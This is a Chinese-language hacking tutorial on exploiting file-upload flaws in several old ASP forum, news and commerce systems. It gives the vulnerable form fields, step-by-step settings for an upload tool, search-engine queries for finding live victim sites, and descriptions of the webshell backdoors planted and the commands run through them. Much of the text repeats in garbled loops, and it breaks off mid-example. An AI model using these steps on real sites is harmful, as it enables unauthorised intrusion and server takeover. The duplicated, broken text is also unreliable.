最大的網(wǎng)站源碼資源下載站,
自從動(dòng)網(wǎng)7拉開上傳漏洞序幕后,各種系統(tǒng)的上傳漏洞接踵而來!它們的漏洞原理基本都差不多,利用方法上有略微的差異,簡言之可以歸納為幾步:先抓包,然后修改文件類型,再在上傳路徑后加上空格,用十六進(jìn)制編輯器把空格改成00,最后用nc提交。當(dāng)然最好還是找一個(gè)具體的upfile文件來自己分析一下,這樣有助于提高對漏洞的理解和記憶!
本文沒有太高深的技術(shù),只不過是把目前發(fā)現(xiàn)有上傳漏洞的系統(tǒng)按編程語言分類匯總了一下,并通過桂林老兵的一個(gè)軟件,結(jié)合實(shí)例講解各種系統(tǒng)的漏洞利用方法。在具體實(shí)例中上傳了各種流行的webshell,以供大家參考!同時(shí)也希望借此能提醒部分程序員在編程時(shí)要注意思維的嚴(yán)密性,避免千里之堤而潰于蟻穴!下面我們先從老兵的這個(gè)工具開始!
先簡單介紹一下老兵的這個(gè)程序,界面如下圖1所示:
本文沒有太高深的技術(shù),只不過是把目前發(fā)現(xiàn)有上傳漏洞的系統(tǒng)按編程語言分類匯總了一下,并通過桂林老兵的一個(gè)軟件,結(jié)合實(shí)例講解各種系統(tǒng)的漏洞利用方法。在具體實(shí)例中上傳了各種流行的webshell,以供大家參考!同時(shí)也希望借此能提醒部分程序員在編程時(shí)要注意思維的嚴(yán)密性,避免千里之堤而潰于蟻穴!下面我們先從老兵的這個(gè)工具開始!
先簡單介紹一下老兵的這個(gè)程序,界面如下圖1所示:
先簡單介紹一下老兵的這個(gè)程序,界面如下圖1所示:
圖1
為了方便說明,我們對照dvbbs的upfile.asp和reg_upload.asp兩個(gè)文件來說明(不一定要全部看懂,大概意思知道就行了)。upfile.asp文件為存在上傳漏洞的文件,而reg_upload.asp文件為我們在填上圖工具時(shí)用到的參數(shù),也就是說,upfile.asp這個(gè)文件在執(zhí)行時(shí)用到的參數(shù)都是來自reg_upload.asp文件中表單所提交的內(nèi)容!
upfile是通過生成一個(gè)form表(在reg_upload.asp文件中)來實(shí)現(xiàn)上傳的。代碼如下:
<form name="form" method="post" action="upfile.asp" ...>
<input type="hidden" name="filepath" value="uploadface">
<input type="hidden" name="act" value="upload">
<input type="file" name="file1">
<input type="hidden" name="fname">
<input type="submit" name="submit" value="上傳" ...></form>
小知識(shí):其中用到的變量如下:
filepath:默認(rèn)值是uploadface,即上傳后默認(rèn)的存放目錄,屬性hiden;
file1:這就是我們要傳的文件;
結(jié)合上面的代碼,我們來填寫上傳工具:
action中輸入存在上傳漏洞文件的url: http://target.net/bbs/upfile.asp
uppath里第一個(gè)文本框中的filepath即為表單中的filepath,也就是上傳路徑,等號(hào)后面填的是上傳到對方服務(wù)器上的后門的名稱/shell.asp;輸入一個(gè)web程序允許上傳的類型文本框中默認(rèn)jpg就可以了(一般網(wǎng)站都允許上傳jpg圖片文件);file里第一個(gè)文本框中的file1即是表單中的file1,等號(hào)后面填寫所要在本機(jī)上傳的木馬路徑;cookies中填上我們用抓取數(shù)據(jù)包工具如wsockexpert抓取的cookies值,記住最好是你在系統(tǒng)中注冊后的cookies值。
劉流:用wsockexpert來抓cookies有點(diǎn)小題大作,作者用的是一個(gè)叫touchnet browser的游覽器,帶有抓cookies功能,使用起來非常方便,大家也可以考慮其它能抓cookie的程序。
好了,“刀”我們已經(jīng)磨鋒利了,現(xiàn)在可以去砍柴了!實(shí)戰(zhàn)開始,下面分別演示由asp、php、jsp三種語言編寫的腳本系統(tǒng)的上傳漏洞!
asp系統(tǒng)上傳漏洞
1.【動(dòng)網(wǎng)論壇】
dvbbs 7.0 sp2以下所有版本(本測試使用dvbbs 7.0 sp1版本)。由于動(dòng)網(wǎng)的上傳漏洞是最常見,也是大家最熟悉的,這里就不多介紹了。分別在程序中各框體內(nèi)填上實(shí)際的數(shù)據(jù),提交后等待就ok了!如圖2所示。
action:填入http://www.***.com/bbs/upfile.asp
uppath第一個(gè)文本框填入:filepath;第二個(gè)填入:/cmd.asp(你也可以寫/bbs/cmd.asp這樣上傳成功后就傳到/bbs 目錄下了!)
輸入一個(gè)web程序允許上傳的類型文本框中默認(rèn)jpg就可以了
file第一個(gè)文本框輸入:file1;第二個(gè)填入:d:/hacktools/muma/cmd.asp(這個(gè)是cmd.asp這個(gè)后門在自己機(jī)器上的路徑)
cookies:是我用touchnet browse這個(gè)瀏覽器抓的!其主要功能是用來驗(yàn)證!沒有它會(huì)報(bào)錯(cuò)的噢!填好了!我們就點(diǎn)擊“submit”按鍵提交吧??!
upfile是通過生成一個(gè)form表(在reg_upload.asp文件中)來實(shí)現(xiàn)上傳的。代碼如下:
<form name="form" method="post" action="upfile.asp" ...>
<input type="hidden" name="filepath" value="uploadface">
<input type="hidden" name="act" value="upload">
<input type="file" name="file1">
<input type="hidden" name="fname">
<input type="submit" name="submit" value="上傳" ...></form>
小知識(shí):其中用到的變量如下:
filepath:默認(rèn)值是uploadface,即上傳后默認(rèn)的存放目錄,屬性hiden;
file1:這就是我們要傳的文件;
結(jié)合上面的代碼,我們來填寫上傳工具:
action中輸入存在上傳漏洞文件的url: http://target.net/bbs/upfile.asp
uppath里第一個(gè)文本框中的filepath即為表單中的filepath,也就是上傳路徑,等號(hào)后面填的是上傳到對方服務(wù)器上的后門的名稱/shell.asp;輸入一個(gè)web程序允許上傳的類型文本框中默認(rèn)jpg就可以了(一般網(wǎng)站都允許上傳jpg圖片文件);file里第一個(gè)文本框中的file1即是表單中的file1,等號(hào)后面填寫所要在本機(jī)上傳的木馬路徑;cookies中填上我們用抓取數(shù)據(jù)包工具如wsockexpert抓取的cookies值,記住最好是你在系統(tǒng)中注冊后的cookies值。
劉流:用wsockexpert來抓cookies有點(diǎn)小題大作,作者用的是一個(gè)叫touchnet browser的游覽器,帶有抓cookies功能,使用起來非常方便,大家也可以考慮其它能抓cookie的程序。
好了,“刀”我們已經(jīng)磨鋒利了,現(xiàn)在可以去砍柴了!實(shí)戰(zhàn)開始,下面分別演示由asp、php、jsp三種語言編寫的腳本系統(tǒng)的上傳漏洞!
asp系統(tǒng)上傳漏洞
1.【動(dòng)網(wǎng)論壇】
dvbbs 7.0 sp2以下所有版本(本測試使用dvbbs 7.0 sp1版本)。由于動(dòng)網(wǎng)的上傳漏洞是最常見,也是大家最熟悉的,這里就不多介紹了。分別在程序中各框體內(nèi)填上實(shí)際的數(shù)據(jù),提交后等待就ok了!如圖2所示。
action:填入http://www.***.com/bbs/upfile.asp
uppath第一個(gè)文本框填入:filepath;第二個(gè)填入:/cmd.asp(你也可以寫/bbs/cmd.asp這樣上傳成功后就傳到/bbs 目錄下了!)
輸入一個(gè)web程序允許上傳的類型文本框中默認(rèn)jpg就可以了
file第一個(gè)文本框輸入:file1;第二個(gè)填入:d:/hacktools/muma/cmd.asp(這個(gè)是cmd.asp這個(gè)后門在自己機(jī)器上的路徑)
cookies:是我用touchnet browse這個(gè)瀏覽器抓的!其主要功能是用來驗(yàn)證!沒有它會(huì)報(bào)錯(cuò)的噢!填好了!我們就點(diǎn)擊“submit”按鍵提交吧?。?/p>
<form name="form" method="post" action="upfile.asp" ...>
<input type="hidden" name="filepath" value="uploadface">
<input type="hidden" name="act" value="upload">
<input type="file" name="file1">
<input type="hidden" name="fname">
<input type="submit" name="submit" value="上傳" ...></form>
小知識(shí):其中用到的變量如下:
filepath:默認(rèn)值是uploadface,即上傳后默認(rèn)的存放目錄,屬性hiden;
file1:這就是我們要傳的文件;
結(jié)合上面的代碼,我們來填寫上傳工具:
action中輸入存在上傳漏洞文件的url: http://target.net/bbs/upfile.asp
uppath里第一個(gè)文本框中的filepath即為表單中的filepath,也就是上傳路徑,等號(hào)后面填的是上傳到對方服務(wù)器上的后門的名稱/shell.asp;輸入一個(gè)web程序允許上傳的類型文本框中默認(rèn)jpg就可以了(一般網(wǎng)站都允許上傳jpg圖片文件);file里第一個(gè)文本框中的file1即是表單中的file1,等號(hào)后面填寫所要在本機(jī)上傳的木馬路徑;cookies中填上我們用抓取數(shù)據(jù)包工具如wsockexpert抓取的cookies值,記住最好是你在系統(tǒng)中注冊后的cookies值。
劉流:用wsockexpert來抓cookies有點(diǎn)小題大作,作者用的是一個(gè)叫touchnet browser的游覽器,帶有抓cookies功能,使用起來非常方便,大家也可以考慮其它能抓cookie的程序。
好了,“刀”我們已經(jīng)磨鋒利了,現(xiàn)在可以去砍柴了!實(shí)戰(zhàn)開始,下面分別演示由asp、php、jsp三種語言編寫的腳本系統(tǒng)的上傳漏洞!
asp系統(tǒng)上傳漏洞
1.【動(dòng)網(wǎng)論壇】
dvbbs 7.0 sp2以下所有版本(本測試使用dvbbs 7.0 sp1版本)。由于動(dòng)網(wǎng)的上傳漏洞是最常見,也是大家最熟悉的,這里就不多介紹了。分別在程序中各框體內(nèi)填上實(shí)際的數(shù)據(jù),提交后等待就ok了!如圖2所示。
action:填入http://www.***.com/bbs/upfile.asp
uppath第一個(gè)文本框填入:filepath;第二個(gè)填入:/cmd.asp(你也可以寫/bbs/cmd.asp這樣上傳成功后就傳到/bbs 目錄下了!)
輸入一個(gè)web程序允許上傳的類型文本框中默認(rèn)jpg就可以了
file第一個(gè)文本框輸入:file1;第二個(gè)填入:d:/hacktools/muma/cmd.asp(這個(gè)是cmd.asp這個(gè)后門在自己機(jī)器上的路徑)
cookies:是我用touchnet browse這個(gè)瀏覽器抓的!其主要功能是用來驗(yàn)證!沒有它會(huì)報(bào)錯(cuò)的噢!填好了!我們就點(diǎn)擊“submit”按鍵提交吧?。?/p>
filepath:默認(rèn)值是uploadface,即上傳后默認(rèn)的存放目錄,屬性hiden;
file1:這就是我們要傳的文件;
結(jié)合上面的代碼,我們來填寫上傳工具:
action中輸入存在上傳漏洞文件的url: http://target.net/bbs/upfile.asp
uppath里第一個(gè)文本框中的filepath即為表單中的filepath,也就是上傳路徑,等號(hào)后面填的是上傳到對方服務(wù)器上的后門的名稱/shell.asp;輸入一個(gè)web程序允許上傳的類型文本框中默認(rèn)jpg就可以了(一般網(wǎng)站都允許上傳jpg圖片文件);file里第一個(gè)文本框中的file1即是表單中的file1,等號(hào)后面填寫所要在本機(jī)上傳的木馬路徑;cookies中填上我們用抓取數(shù)據(jù)包工具如wsockexpert抓取的cookies值,記住最好是你在系統(tǒng)中注冊后的cookies值。
劉流:用wsockexpert來抓cookies有點(diǎn)小題大作,作者用的是一個(gè)叫touchnet browser的游覽器,帶有抓cookies功能,使用起來非常方便,大家也可以考慮其它能抓cookie的程序。
好了,“刀”我們已經(jīng)磨鋒利了,現(xiàn)在可以去砍柴了!實(shí)戰(zhàn)開始,下面分別演示由asp、php、jsp三種語言編寫的腳本系統(tǒng)的上傳漏洞!
asp系統(tǒng)上傳漏洞
1.【動(dòng)網(wǎng)論壇】
dvbbs 7.0 sp2以下所有版本(本測試使用dvbbs 7.0 sp1版本)。由于動(dòng)網(wǎng)的上傳漏洞是最常見,也是大家最熟悉的,這里就不多介紹了。分別在程序中各框體內(nèi)填上實(shí)際的數(shù)據(jù),提交后等待就ok了!如圖2所示。
action:填入http://www.***.com/bbs/upfile.asp
uppath第一個(gè)文本框填入:filepath;第二個(gè)填入:/cmd.asp(你也可以寫/bbs/cmd.asp這樣上傳成功后就傳到/bbs 目錄下了!)
輸入一個(gè)web程序允許上傳的類型文本框中默認(rèn)jpg就可以了
file第一個(gè)文本框輸入:file1;第二個(gè)填入:d:/hacktools/muma/cmd.asp(這個(gè)是cmd.asp這個(gè)后門在自己機(jī)器上的路徑)
cookies:是我用touchnet browse這個(gè)瀏覽器抓的!其主要功能是用來驗(yàn)證!沒有它會(huì)報(bào)錯(cuò)的噢!填好了!我們就點(diǎn)擊“submit”按鍵提交吧??!
uppath里第一個(gè)文本框中的filepath即為表單中的filepath,也就是上傳路徑,等號(hào)后面填的是上傳到對方服務(wù)器上的后門的名稱/shell.asp;輸入一個(gè)web程序允許上傳的類型文本框中默認(rèn)jpg就可以了(一般網(wǎng)站都允許上傳jpg圖片文件);file里第一個(gè)文本框中的file1即是表單中的file1,等號(hào)后面填寫所要在本機(jī)上傳的木馬路徑;cookies中填上我們用抓取數(shù)據(jù)包工具如wsockexpert抓取的cookies值,記住最好是你在系統(tǒng)中注冊后的cookies值。
劉流:用wsockexpert來抓cookies有點(diǎn)小題大作,作者用的是一個(gè)叫touchnet browser的游覽器,帶有抓cookies功能,使用起來非常方便,大家也可以考慮其它能抓cookie的程序。
好了,“刀”我們已經(jīng)磨鋒利了,現(xiàn)在可以去砍柴了!實(shí)戰(zhàn)開始,下面分別演示由asp、php、jsp三種語言編寫的腳本系統(tǒng)的上傳漏洞!
asp系統(tǒng)上傳漏洞
1.【動(dòng)網(wǎng)論壇】
dvbbs 7.0 sp2以下所有版本(本測試使用dvbbs 7.0 sp1版本)。由于動(dòng)網(wǎng)的上傳漏洞是最常見,也是大家最熟悉的,這里就不多介紹了。分別在程序中各框體內(nèi)填上實(shí)際的數(shù)據(jù),提交后等待就ok了!如圖2所示。
action:填入http://www.***.com/bbs/upfile.asp
uppath第一個(gè)文本框填入:filepath;第二個(gè)填入:/cmd.asp(你也可以寫/bbs/cmd.asp這樣上傳成功后就傳到/bbs 目錄下了!)
輸入一個(gè)web程序允許上傳的類型文本框中默認(rèn)jpg就可以了
file第一個(gè)文本框輸入:file1;第二個(gè)填入:d:/hacktools/muma/cmd.asp(這個(gè)是cmd.asp這個(gè)后門在自己機(jī)器上的路徑)
cookies:是我用touchnet browse這個(gè)瀏覽器抓的!其主要功能是用來驗(yàn)證!沒有它會(huì)報(bào)錯(cuò)的噢!填好了!我們就點(diǎn)擊“submit”按鍵提交吧??!
劉流:用wsockexpert來抓cookies有點(diǎn)小題大作,作者用的是一個(gè)叫touchnet browser的游覽器,帶有抓cookies功能,使用起來非常方便,大家也可以考慮其它能抓cookie的程序。
好了,“刀”我們已經(jīng)磨鋒利了,現(xiàn)在可以去砍柴了!實(shí)戰(zhàn)開始,下面分別演示由asp、php、jsp三種語言編寫的腳本系統(tǒng)的上傳漏洞!
asp系統(tǒng)上傳漏洞
1.【動(dòng)網(wǎng)論壇】
dvbbs 7.0 sp2以下所有版本(本測試使用dvbbs 7.0 sp1版本)。由于動(dòng)網(wǎng)的上傳漏洞是最常見,也是大家最熟悉的,這里就不多介紹了。分別在程序中各框體內(nèi)填上實(shí)際的數(shù)據(jù),提交后等待就ok了!如圖2所示。
action:填入http://www.***.com/bbs/upfile.asp
uppath第一個(gè)文本框填入:filepath;第二個(gè)填入:/cmd.asp(你也可以寫/bbs/cmd.asp這樣上傳成功后就傳到/bbs 目錄下了!)
輸入一個(gè)web程序允許上傳的類型文本框中默認(rèn)jpg就可以了
file第一個(gè)文本框輸入:file1;第二個(gè)填入:d:/hacktools/muma/cmd.asp(這個(gè)是cmd.asp這個(gè)后門在自己機(jī)器上的路徑)
cookies:是我用touchnet browse這個(gè)瀏覽器抓的!其主要功能是用來驗(yàn)證!沒有它會(huì)報(bào)錯(cuò)的噢!填好了!我們就點(diǎn)擊“submit”按鍵提交吧??!
asp系統(tǒng)上傳漏洞
1.【動(dòng)網(wǎng)論壇】
dvbbs 7.0 sp2以下所有版本(本測試使用dvbbs 7.0 sp1版本)。由于動(dòng)網(wǎng)的上傳漏洞是最常見,也是大家最熟悉的,這里就不多介紹了。分別在程序中各框體內(nèi)填上實(shí)際的數(shù)據(jù),提交后等待就ok了!如圖2所示。
action:填入http://www.***.com/bbs/upfile.asp
uppath第一個(gè)文本框填入:filepath;第二個(gè)填入:/cmd.asp(你也可以寫/bbs/cmd.asp這樣上傳成功后就傳到/bbs 目錄下了!)
輸入一個(gè)web程序允許上傳的類型文本框中默認(rèn)jpg就可以了
file第一個(gè)文本框輸入:file1;第二個(gè)填入:d:/hacktools/muma/cmd.asp(這個(gè)是cmd.asp這個(gè)后門在自己機(jī)器上的路徑)
cookies:是我用touchnet browse這個(gè)瀏覽器抓的!其主要功能是用來驗(yàn)證!沒有它會(huì)報(bào)錯(cuò)的噢!填好了!我們就點(diǎn)擊“submit”按鍵提交吧??!
1.【動(dòng)網(wǎng)論壇】
dvbbs 7.0 sp2以下所有版本(本測試使用dvbbs 7.0 sp1版本)。由于動(dòng)網(wǎng)的上傳漏洞是最常見,也是大家最熟悉的,這里就不多介紹了。分別在程序中各框體內(nèi)填上實(shí)際的數(shù)據(jù),提交后等待就ok了!如圖2所示。
action:填入http://www.***.com/bbs/upfile.asp
uppath第一個(gè)文本框填入:filepath;第二個(gè)填入:/cmd.asp(你也可以寫/bbs/cmd.asp這樣上傳成功后就傳到/bbs 目錄下了!)
輸入一個(gè)web程序允許上傳的類型文本框中默認(rèn)jpg就可以了
file第一個(gè)文本框輸入:file1;第二個(gè)填入:d:/hacktools/muma/cmd.asp(這個(gè)是cmd.asp這個(gè)后門在自己機(jī)器上的路徑)
cookies:是我用touchnet browse這個(gè)瀏覽器抓的!其主要功能是用來驗(yàn)證!沒有它會(huì)報(bào)錯(cuò)的噢!填好了!我們就點(diǎn)擊“submit”按鍵提交吧!!
dvbbs 7.0 sp2以下所有版本(本測試使用dvbbs 7.0 sp1版本)。由于動(dòng)網(wǎng)的上傳漏洞是最常見,也是大家最熟悉的,這里就不多介紹了。分別在程序中各框體內(nèi)填上實(shí)際的數(shù)據(jù),提交后等待就ok了!如圖2所示。
action:填入http://www.***.com/bbs/upfile.asp
uppath第一個(gè)文本框填入:filepath;第二個(gè)填入:/cmd.asp(你也可以寫/bbs/cmd.asp這樣上傳成功后就傳到/bbs 目錄下了!)
輸入一個(gè)web程序允許上傳的類型文本框中默認(rèn)jpg就可以了
file第一個(gè)文本框輸入:file1;第二個(gè)填入:d:/hacktools/muma/cmd.asp(這個(gè)是cmd.asp這個(gè)后門在自己機(jī)器上的路徑)
cookies:是我用touchnet browse這個(gè)瀏覽器抓的!其主要功能是用來驗(yàn)證!沒有它會(huì)報(bào)錯(cuò)的噢!填好了!我們就點(diǎn)擊“submit”按鍵提交吧!!
action:填入http://www.***.com/bbs/upfile.asp
uppath第一個(gè)文本框填入:filepath;第二個(gè)填入:/cmd.asp(你也可以寫/bbs/cmd.asp這樣上傳成功后就傳到/bbs 目錄下了!)
輸入一個(gè)web程序允許上傳的類型文本框中默認(rèn)jpg就可以了
file第一個(gè)文本框輸入:file1;第二個(gè)填入:d:/hacktools/muma/cmd.asp(這個(gè)是cmd.asp這個(gè)后門在自己機(jī)器上的路徑)
cookies:是我用touchnet browse這個(gè)瀏覽器抓的!其主要功能是用來驗(yàn)證!沒有它會(huì)報(bào)錯(cuò)的噢!填好了!我們就點(diǎn)擊“submit”按鍵提交吧!!
圖2
提交后用瀏覽器看一下是否成功,成功上傳!如圖3所示。
圖3
后門介紹:用的是一個(gè)很老的后門,文本框中輸入dos命令”netstat –an”點(diǎn)運(yùn)行后,就會(huì)看到本機(jī)都開了哪些端口,及與遠(yuǎn)程主機(jī)的連接情況了^_^
小提示:文件已經(jīng)上傳成功,但沒有出現(xiàn)“上傳成功”的提示對話框,可以在瀏覽器里直接輸入目標(biāo)站點(diǎn)上的webshell路徑來測試是否成功,程序有時(shí)候會(huì)有誤報(bào)。
2.【塵緣新聞系統(tǒng)】
塵緣新聞系統(tǒng)0.45 finish以下版本(測試版本v1.0 access finish)。先在google里搜索關(guān)鍵詞:v1.0 access finish,會(huì)看到出現(xiàn)一大堆使用塵緣雅境系統(tǒng)的網(wǎng)站,而它們就是我們的目標(biāo)了!
先來分析一下如何填寫參數(shù):比如說某網(wǎng)站首頁是http://www.xx.com/asfq/index.asp,那么就要這樣填寫:
action:http://www.xx.com/asfq/admin/uploadfaceok.asp
漏洞目錄:/asfq/admin(注意一定要加上admin)
在uploadface.asp中找相應(yīng)的參數(shù);uploadface.asp中的如下表單:
<form name="form" method="post" action="uploadfaceok.asp" enctype="multipart/form-data" >
<input type="hidden" name="copyrightinfo" value="http://www.chinaasp.com">
<input type="hidden" name="filepath" value="../uploadfile/face/">
<input type="hidden" name="act" value="upload"><input type="file" name="file1" size=10 title="類型:jpg,gif,png,bmp,限制:200k">
<input type="submit" name="submit" value="上傳" >
參數(shù)的填寫方法類似動(dòng)網(wǎng)的!
提交數(shù)據(jù),成功后結(jié)果如圖4、5所示。
小提示:文件已經(jīng)上傳成功,但沒有出現(xiàn)“上傳成功”的提示對話框,可以在瀏覽器里直接輸入目標(biāo)站點(diǎn)上的webshell路徑來測試是否成功,程序有時(shí)候會(huì)有誤報(bào)。
2.【塵緣新聞系統(tǒng)】
塵緣新聞系統(tǒng)0.45 finish以下版本(測試版本v1.0 access finish)。先在google里搜索關(guān)鍵詞:v1.0 access finish,會(huì)看到出現(xiàn)一大堆使用塵緣雅境系統(tǒng)的網(wǎng)站,而它們就是我們的目標(biāo)了!
先來分析一下如何填寫參數(shù):比如說某網(wǎng)站首頁是http://www.xx.com/asfq/index.asp,那么就要這樣填寫:
action:http://www.xx.com/asfq/admin/uploadfaceok.asp
漏洞目錄:/asfq/admin(注意一定要加上admin)
在uploadface.asp中找相應(yīng)的參數(shù);uploadface.asp中的如下表單:
<form name="form" method="post" action="uploadfaceok.asp" enctype="multipart/form-data" >
<input type="hidden" name="copyrightinfo" value="http://www.chinaasp.com">
<input type="hidden" name="filepath" value="../uploadfile/face/">
<input type="hidden" name="act" value="upload"><input type="file" name="file1" size=10 title="類型:jpg,gif,png,bmp,限制:200k">
<input type="submit" name="submit" value="上傳" >
參數(shù)的填寫方法類似動(dòng)網(wǎng)的!
提交數(shù)據(jù),成功后結(jié)果如圖4、5所示。
塵緣新聞系統(tǒng)0.45 finish以下版本(測試版本v1.0 access finish)。先在google里搜索關(guān)鍵詞:v1.0 access finish,會(huì)看到出現(xiàn)一大堆使用塵緣雅境系統(tǒng)的網(wǎng)站,而它們就是我們的目標(biāo)了!
先來分析一下如何填寫參數(shù):比如說某網(wǎng)站首頁是http://www.xx.com/asfq/index.asp,那么就要這樣填寫:
action:http://www.xx.com/asfq/admin/uploadfaceok.asp
漏洞目錄:/asfq/admin(注意一定要加上admin)
在uploadface.asp中找相應(yīng)的參數(shù);uploadface.asp中的如下表單:
<form name="form" method="post" action="uploadfaceok.asp" enctype="multipart/form-data" >
<input type="hidden" name="copyrightinfo" value="http://www.chinaasp.com">
<input type="hidden" name="filepath" value="../uploadfile/face/">
<input type="hidden" name="act" value="upload"><input type="file" name="file1" size=10 title="類型:jpg,gif,png,bmp,限制:200k">
<input type="submit" name="submit" value="上傳" >
參數(shù)的填寫方法類似動(dòng)網(wǎng)的!
提交數(shù)據(jù),成功后結(jié)果如圖4、5所示。
先來分析一下如何填寫參數(shù):比如說某網(wǎng)站首頁是http://www.xx.com/asfq/index.asp,那么就要這樣填寫:
action:http://www.xx.com/asfq/admin/uploadfaceok.asp
漏洞目錄:/asfq/admin(注意一定要加上admin)
在uploadface.asp中找相應(yīng)的參數(shù);uploadface.asp中的如下表單:
<form name="form" method="post" action="uploadfaceok.asp" enctype="multipart/form-data" >
<input type="hidden" name="copyrightinfo" value="http://www.chinaasp.com">
<input type="hidden" name="filepath" value="../uploadfile/face/">
<input type="hidden" name="act" value="upload"><input type="file" name="file1" size=10 title="類型:jpg,gif,png,bmp,限制:200k">
<input type="submit" name="submit" value="上傳" >
參數(shù)的填寫方法類似動(dòng)網(wǎng)的!
提交數(shù)據(jù),成功后結(jié)果如圖4、5所示。
action:http://www.xx.com/asfq/admin/uploadfaceok.asp
漏洞目錄:/asfq/admin(注意一定要加上admin)
在uploadface.asp中找相應(yīng)的參數(shù);uploadface.asp中的如下表單:
<form name="form" method="post" action="uploadfaceok.asp" enctype="multipart/form-data" >
<input type="hidden" name="copyrightinfo" value="http://www.chinaasp.com">
<input type="hidden" name="filepath" value="../uploadfile/face/">
<input type="hidden" name="act" value="upload"><input type="file" name="file1" size=10 title="類型:jpg,gif,png,bmp,限制:200k">
<input type="submit" name="submit" value="上傳" >
參數(shù)的填寫方法類似動(dòng)網(wǎng)的!
提交數(shù)據(jù),成功后結(jié)果如圖4、5所示。
漏洞目錄:/asfq/admin(注意一定要加上admin)
在uploadface.asp中找相應(yīng)的參數(shù);uploadface.asp中的如下表單:
<form name="form" method="post" action="uploadfaceok.asp" enctype="multipart/form-data" >
<input type="hidden" name="copyrightinfo" value="http://www.chinaasp.com">
<input type="hidden" name="filepath" value="../uploadfile/face/">
<input type="hidden" name="act" value="upload"><input type="file" name="file1" size=10 title="類型:jpg,gif,png,bmp,限制:200k">
<input type="submit" name="submit" value="上傳" >
參數(shù)的填寫方法類似動(dòng)網(wǎng)的!
提交數(shù)據(jù),成功后結(jié)果如圖4、5所示。
在uploadface.asp中找相應(yīng)的參數(shù);uploadface.asp中的如下表單:
<form name="form" method="post" action="uploadfaceok.asp" enctype="multipart/form-data" >
<input type="hidden" name="copyrightinfo" value="http://www.chinaasp.com">
<input type="hidden" name="filepath" value="../uploadfile/face/">
<input type="hidden" name="act" value="upload"><input type="file" name="file1" size=10 title="類型:jpg,gif,png,bmp,限制:200k">
<input type="submit" name="submit" value="上傳" >
參數(shù)的填寫方法類似動(dòng)網(wǎng)的!
提交數(shù)據(jù),成功后結(jié)果如圖4、5所示。
圖4
圖5
后門介紹:用的是動(dòng)鯊的一個(gè)網(wǎng)頁木馬,執(zhí)行dos之前,你還要把c:/winnt/system32/cmd.exe上傳到與網(wǎng)頁木馬相同的目錄下,否則命令是不會(huì)執(zhí)行的!很多網(wǎng)站做了安全策略,利用上例的木馬dos命令不能執(zhí)行,有時(shí)利用動(dòng)鯊的這個(gè)asp木馬就可以執(zhí)行一些dos命令了!
小提示:漏洞文件一般不用改,不過有些老版的塵緣系統(tǒng)的漏洞文件是uploadok.asp,如果uploadfaceok.asp不成功再改成uploadok.asp。
小提示:漏洞文件一般不用改,不過有些老版的塵緣系統(tǒng)的漏洞文件是uploadok.asp,如果uploadfaceok.asp不成功再改成uploadok.asp。
3.【動(dòng)感下載系統(tǒng)】
動(dòng)感下載系統(tǒng)xp專業(yè)版 v1.3 build 0112及以下版本。在百度里搜索:softview.asp?softid=,找到n多套系統(tǒng)。在它的upload.asp中存在如下表單:
<form name="form" method="post" action="upfile.asp" enctype="multipart/form-data" >
<input type="hidden" name="filepath" value="../upload200409">
<input type="hidden" name="act" value="upload">文件位置:
<input type="file" name="file1" size="38">
<input type="submit" name="submit" value="上傳" > <br>文件類型:gif/jpg/zip/rar,大小限制:3000k</form>
有功底的朋友大概都看出來問題了吧?這里文章不是分析具體漏洞的,也就不做詳細(xì)講解了,新手朋友們就直接先按下面的參數(shù)提交成功后再來慢慢研究具體的漏洞吧!如圖6、7所示。
圖6
圖7
后門介紹: _blank>冰狐浪子微型asp后門,非常小的一個(gè)后門僅一句話,也可插在別的網(wǎng)頁里面,它把常用功能集成到一起,寫入存在的文件、環(huán)境探測、磁盤信息、搜索網(wǎng)絡(luò)鄰居共享
小提示:在百度里搜索:softview.asp?softid=找到的版本是access版的程序,如果搜索/softview/softview,找到的是sql版的程序。
4.【dxxo論壇】
dxxo論壇2004年1月發(fā)布版。它的uploadface.asp文件中存在如下表單:
<form method="post" action="upload.asp" enctype="multipart/form-data" name="form2" class=tdc >
<input type=file name="file1" size="40" class=bdtj>
<input type="hidden" name=" uploadfacey" value="uploadface/">
<input type="submit" name="submit" value="上 傳" class=bdtj></form>
這里和前面的漏洞有點(diǎn)不同,uppath 第一個(gè)文本框中要改成uploadfacey而不是上例中的filepath,cookies的值要注冊后抓的值,不然無法成功!具體參數(shù)如下圖8,9所示。
圖8
圖9
后門介紹:一個(gè)很不錯(cuò)的木馬,可以讓你在目標(biāo)機(jī)器上寫文件!在保存文件的絕對路徑下的文本框中輸入目標(biāo)機(jī)器上木馬的存放位置和文件名,絕對路徑下面已經(jīng)給出來了!我們可以參照著它寫;在輸入馬的內(nèi)容中復(fù)制上木馬的內(nèi)容!點(diǎn)保存就ok了!
小提示:這里不要管圖8左邊文本框出現(xiàn)的上傳成功后顯示的文件名(下劃線部分):
<script>parent.form1.f3_content.value+='[uploadimg]fyzw_2004926201636.jpg[/uploadimg]'</script>test.jpg(1162)上傳成功!沒有看到test.asp,沒關(guān)系只要直接在瀏覽中直接輸入webshell的地址訪問就可以得到后門了(如圖9所示): http://www.ri*an.cc/bbs/uploadface/test.asp
5.【天意商務(wù)網(wǎng)】
天意商務(wù)網(wǎng)3.6、3.7版。在百度中搜索“天意商務(wù)網(wǎng)”,會(huì)找到很多裝有天意商務(wù)網(wǎng)的站點(diǎn)。它的add.asp文件中存在如下表單:
<form method="post" action="zs_save_add.asp" name="form1" nctype="multipart/form-data">
<input type="hidden" name="filepath" value="../../picture/">
<input type="file" class="f11" name="file" size="33"title=上傳產(chǎn)品圖片資料不能大于200k。(要求:250×250像素)>
這里也有一點(diǎn)不同,file的第一個(gè)文本框中要輸入file,“zs_save_add.asp”的確切位置是:“manage/spzs/zs_save_add.asp”,而且成功后也沒有出現(xiàn)“上傳成功”的對話框!參數(shù)如下圖10、11所示:
10圖
圖11
后門介紹:帶有名字,密碼,認(rèn)證,可以把它偽裝成一個(gè)后臺(tái)管理界面,而且功能也很多。
小提示:天意商務(wù)網(wǎng)系統(tǒng)有一個(gè)變量id過濾不嚴(yán),利用nbsi2很容易注入!!
⑥【喬客論壇】
所用版本:joekoe v6.0。這個(gè)是我在做實(shí)驗(yàn)過程中用時(shí)最多的一個(gè),因?yàn)閰?shù)太多,開始實(shí)驗(yàn)時(shí)總是報(bào)參數(shù)錯(cuò)誤。
首先來看如何找到我們用的表單:
在瀏覽中輸入http://www.zr1*3.com/user_put.asp?action=gallery(別忘了登錄噢?。┤缓蟛榭丛次募?nèi)容:
